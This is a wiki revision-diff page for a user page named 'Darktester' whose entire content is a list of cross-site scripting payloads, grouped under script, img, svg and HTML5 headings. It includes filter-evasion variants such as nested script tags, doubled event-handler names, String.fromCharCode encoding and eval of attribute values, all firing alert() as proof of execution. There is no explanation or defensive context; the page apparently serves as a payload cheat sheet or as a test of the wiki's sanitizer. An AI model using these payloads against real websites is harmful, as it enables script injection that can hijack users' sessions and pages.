User:Darktester: Difference between revisions
Darktester (talk | contribs) No edit summary |
Darktester (talk | contribs) No edit summary |
||
| Line 1: | Line 1: | ||
< | <script>alert('XSS')</script> | ||
<scr<script>ipt>alert('XSS')</scr<script>ipt> | |||
"><script>alert('XSS')</script> | |||
"><script>alert(String.fromCharCode(88,83,83))</script> | |||
Img payload | |||
<img src=x onerror=alert('XSS');> | |||
<img src=x onerror=alert('XSS')// | |||
<img src=x onerror=alert(String.fromCharCode(88,83,83));> | |||
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> | |||
<img src=x:alert(alt) onerror=eval(src) alt=xss> | |||
"><img src=x onerror=alert('XSS');> | |||
"><img src=x onerror=alert(String.fromCharCode(88,83,83));> | |||
Svg payload | |||
<svg onload=alert(1)> | |||
<svg/onload=alert('XSS')> | |||
<svg onload=alert(1)// | |||
<svg/onload=alert(String.fromCharCode(88,83,83))> | |||
<svg id=alert(1) onload=eval(id)> | |||
"><svg/onload=alert(String.fromCharCode(88,83,83))> | |||
"><svg/onload=alert(/XSS/) | |||
XSS for HTML5 | |||
<body onload=alert(/XSS/.source)> | |||
<input autofocus onfocus=alert(1)> | |||
<select autofocus onfocus=alert(1)> | |||
<textarea autofocus onfocus=alert(1)> | |||
<keygen autofocus onfocus=alert(1)> | |||
<video/poster/onerror=alert(1)> | |||
<video><source onerror="javascript:alert(1)"> | |||
<video src=_ onloadstart="alert(1)"> | |||
<details/open/ontoggle="alert'1'"> | |||
<audio src onloadstart=alert(1)> | |||
<marquee onstart=alert(1)> | |||
Revision as of 20:09, 28 May 2018
<script>alert('XSS')</script> <scr<script>ipt>alert('XSS')</scr<script>ipt> "><script>alert('XSS')</script> "><script>alert(String.fromCharCode(88,83,83))</script>
Img payload <img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')// <img src=x onerror=alert(String.fromCharCode(88,83,83));> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> <img src=x:alert(alt) onerror=eval(src) alt=xss> "><img src=x onerror=alert('XSS');> "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
Svg payload <svg onload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)// <svg/onload=alert(String.fromCharCode(88,83,83))> <svg id=alert(1) onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(/XSS/)
XSS for HTML5
<body onload=alert(/XSS/.source)> <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video/poster/onerror=alert(1)> <video><source onerror="javascript:alert(1)"> <video src=_ onloadstart="alert(1)"> <details/open/ontoggle="alert'1'"> <audio src onloadstart=alert(1)> <marquee onstart=alert(1)>